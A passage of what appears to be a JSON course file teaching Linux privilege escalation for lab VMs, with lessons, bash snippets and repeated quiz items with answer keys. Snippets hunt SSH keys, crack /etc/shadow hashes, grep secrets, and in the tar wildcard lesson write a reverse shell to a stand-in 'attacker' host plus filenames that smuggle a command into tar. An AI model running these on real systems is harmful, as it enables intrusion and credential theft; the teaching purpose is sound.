descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-kernel-version","cat":"Privilege Escalation","title":"Kernel Version Checking","diff":1,"xp":50,"intro":"Check the kernel version for known local exploits.","sections":[{"type":"text","content":"Match the kernel version against known exploits. Tools like linux-exploit-suggester automate the search."},{"type":"code","lang":"bash","content":"uname -r\nuname -a\ncat /etc/os-release\n# Automated\nlinux-exploit-suggester.sh\n# Or searchsploit\nsearchsploit linux kernel $(uname -r | cut -d'-' -f1) privilege"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Why check the kernel version?","opts":["To find CPU speed","To find known local privilege escalation exploits","To check disk space","To see memory usage"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-writable-files","cat":"Privilege Escalation","title":"Finding Writable Files and Directories","diff":1,"xp":75,"intro":"Writable files in privileged locations enable escalation.","sections":[{"type":"text","content":"Find world-writable files, especially in /etc/, cron directories, service configs, and PATH directories."},{"type":"code","lang":"bash","content":"find / -writable -type f 2>/dev/null | grep -v proc\nfind /etc -writable -type f 2>/dev/null\nfind / -perm -o+w -type d 2>/dev/null"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Writable files in /etc/ are dangerous because...","opts":["They waste disk space","System configs can be modified for privilege escalation","They slow the system","They cause errors"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-ssh-keys-found","cat":"Privilege Escalation","title":"Finding SSH Keys","diff":1,"xp":75,"intro":"Discover SSH private keys for lateral movement or escalation.","sections":[{"type":"text","content":"Search for SSH private keys left by other users. They may provide access to other systems or the current system as a different user."},{"type":"code","lang":"bash","content":"find / -name 'id_rsa' -o -name 'id_ed25519' -o -name 'id_dsa' 2>/dev/null\nfind / -name '*.pem' -o -name '*.key' 2>/dev/null\nls -la /home/*/.ssh/\nls -la /root/.ssh/"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Finding SSH private keys enables...","opts":["Port scanning","Authentication as other users without passwords","DNS lookup","File encryption"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-passwd-shadow","cat":"Privilege Escalation","title":"Password File Analysis","diff":1,"xp":75,"intro":"Read /etc/passwd and /etc/shadow for user and hash information.","sections":[{"type":"text","content":"/etc/passwd is world-readable and shows user accounts. /etc/shadow (root only) contains password hashes. If shadow is readable, crack the hashes."},{"type":"code","lang":"bash","content":"cat /etc/passwd | grep -v nologin | grep -v false\ncat /etc/shadow  # if readable!\n# Crack hashes\njohn --wordlist=rockyou.txt shadow.txt\nhashcat -m 1800 shadow_hashes.txt rockyou.txt  # SHA-512"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"If /etc/shadow is readable by your user...","opts":["Nothing useful","You can extract and crack password hashes offline","You can change passwords","You can delete users"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-config-files","cat":"Privilege Escalation","title":"Configuration File Credentials","diff":1,"xp":75,"intro":"Search config files for hardcoded passwords and keys.","sections":[{"type":"text","content":"Credentials hide in: database configs, web app configs, .env files, history files, and backup files."},{"type":"code","lang":"bash","content":"find / -name '*.conf' -exec grep -liE 'password|passwd|secret|key|token' {} ; 2>/dev/null\nfind / -name '.env' 2>/dev/null\ncat ~/.bash_history | grep -iE 'pass|secret|key|mysql|ssh'\nfind / -name 'wp-config.php' 2>/dev/null"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Config files leak credentials because...","opts":["They're encrypted","Developers hardcode passwords for convenience","They're binary","They're compressed"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-network-services","cat":"Privilege Escalation","title":"Internal Service Exploitation","diff":2,"xp":150,"intro":"Find and exploit services only accessible from the target host.","sections":[{"type":"text","content":"Services bound to 127.0.0.1 (MySQL, Redis, Memcached, Elasticsearch) may have weak auth or RCE vulnerabilities only accessible locally."},{"type":"code","lang":"bash","content":"ss -tlnp | grep 127.0.0.1\nnetstat -tlnp | grep LISTEN\n# Common internal services:\n# MySQL (3306): mysql -u root -p (try no password)\n# Redis (6379): redis-cli (try no auth)\n# Elasticsearch (9200): curl localhost:9200"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Internal services are valuable because...","opts":["They're faster","They often have weaker authentication than external services","They use encryption","They're monitored"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-tar-wildcard","cat":"Privilege Escalation","title":"Tar Wildcard Injection","diff":2,"xp":150,"intro":"Inject tar arguments through crafted filenames.","sections":[{"type":"text","content":"If root runs 'tar czf backup.tar.gz *', create files named --checkpoint=1 and --checkpoint-action=exec=payload. Shell expansion passes them as tar arguments."},{"type":"code","lang":"bash","content":"echo '#!/bin/bash' > /var/backup/shell.sh\necho 'bash -i >& /dev/tcp/attacker/4444 0>&1' >> /var/backup/shell.sh\ntouch -- '--checkpoint=1'\ntouch -- '--checkpoint-action=exec=sh shell.sh'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Tar wildcard injection works because...","opts":["Tar has a bug","Shell glob expansion turns filenames into command arguments","The archive is writable","Cron is misconfigured"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root 